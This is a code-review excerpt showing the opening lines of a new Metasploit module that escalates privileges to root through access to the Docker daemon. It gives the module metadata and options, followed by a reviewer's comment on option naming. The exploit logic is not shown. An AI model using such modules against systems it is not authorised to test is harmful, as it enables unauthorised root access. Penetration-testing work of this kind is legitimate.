modules/exploits/linux/local/docker_daemon_privilege_escalation.rb

```diff
@@ -0,0 +1,75 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/exploit/exe'
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+  include Msf::Exploit::EXE
+  include Msf::Post::File
+
+  def initialize(info={})
+    super(update_info(info, {
+      'Name'          => 'Docker Daemon Privilege Escalation',
+      'Description'   => %q{
+        This module obtains root privileges from any host account with access to the
+        Docker daemon. Usually this includes accounts in the `docker` group.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        => ['forzoni'],
+      'DisclosureDate' => 'Jun 28 2016',
+      'Platform'      => 'linux',
+      'Arch'          => [ARCH_X86, ARCH_X86_64],
+      'Targets'       => [ ['Automatic', {}] ],
+      'SessionTypes'  => ['shell', 'meterpreter']
+      }
+    ))
+    register_options([
+      OptInt.new("ListenerTimeout", [true, "Number of seconds to wait for the exploit", 60]),
+      OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"])
+    ], self.class)
```

Comment:
The data store options should be capitalized while the advanced options are camel style.